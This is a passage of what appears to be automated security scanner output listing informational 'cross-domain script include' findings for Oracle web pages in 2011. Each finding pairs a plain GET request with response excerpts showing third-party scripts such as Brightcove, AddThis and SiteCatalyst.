</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.252. http://www.oracle.com/us/corporate/profit/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/profit/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/profit/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41045476007478889,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.253. http://www.oracle.com/us/corporate/publishing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/publishing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/publishing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166585496136002,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.254. http://www.oracle.com/us/corporate/timeline/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/timeline/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/timeline/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008974018735591,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Content-Length: 8926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.255. http://www.oracle.com/us/go/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/go/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/go/index.html?Src=7013425&Act=226&pcode=WWMK10042957MPP055 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35920884238154043,0:1)
Content-Length: 3470
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.256. http://www.oracle.com/us/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41041820989036270,0:1)
Date: Tue, 06 Sep 2011 16:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.257. http://www.oracle.com/us/industries/communications/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/communications/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/industries/communications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36012062100267322,0:1)
Date: Tue, 06 Sep 2011 16:16:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.258. http://www.oracle.com/us/industries/education-and-research/018753.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/education-and-research/018753.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/industries/education-and-research/018753.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36012169474451296,0:1)
Date: Tue, 06 Sep 2011 16:16:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.259. http://www.oracle.com/us/industries/engineering-and-construction/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/engineering-and-construction/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/industries/engineering-and-construction/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41185062445493518,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.260. http://www.oracle.com/us/industries/financial-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/financial-services/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/industries/financial-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41122746764032528,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.261. http://www.oracle.com/us/industries/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/industries/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=35659771701213200,0:1)
Date: Tue, 06 Sep 2011 16:16:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.262. http://www.oracle.com/us/industries/retail/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/retail/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/industries/retail/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41103114469486884,0:1)
Date: Tue, 06 Sep 2011 16:16:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.263. http://www.oracle.com/us/partnerships/solutions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/partnerships/solutions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/partnerships/solutions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=7;ecid=35762992651810657,0:1)
Date: Tue, 06 Sep 2011 16:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 682670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ocom/groups/public/@opnpublic/documents/webcontent/430048.css" />
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.264. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/partnerships/specialized-showcase-224514.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/partnerships/specialized-showcase-224514.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41185719575500176,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at https://accounts.brightcove.com/en/terms-and-conditions/.
--> <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id="sidebody1" class="contents">    
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.265. http://www.oracle.com/us/products/applications/fusion/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/fusion/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/applications/fusion/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166757294830496,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.266. http://www.oracle.com/us/products/applications/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/applications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=158;ecid=35949802253392290,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.267. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/jd-edwards-enterpriseone/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/applications/jd-edwards-enterpriseone/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36009141522462811,0:1)
Date: Tue, 06 Sep 2011 16:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.268. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/peoplesoft-enterprise/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/applications/peoplesoft-enterprise/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41122111109101137,0:1)
Date: Tue, 06 Sep 2011 16:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.269. http://www.oracle.com/us/products/applications/primavera/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/primavera/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/applications/primavera/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166877553917005,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.270. http://www.oracle.com/us/products/consulting/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/consulting/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/consulting/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168123094454758,0:1)
Date: Tue, 06 Sep 2011 16:16:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.271. http://www.oracle.com/us/products/database/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/database/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/database/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41104377188862589,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.272. http://www.oracle.com/us/products/enterprise-manager/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/enterprise-manager/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/products/enterprise-manager/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
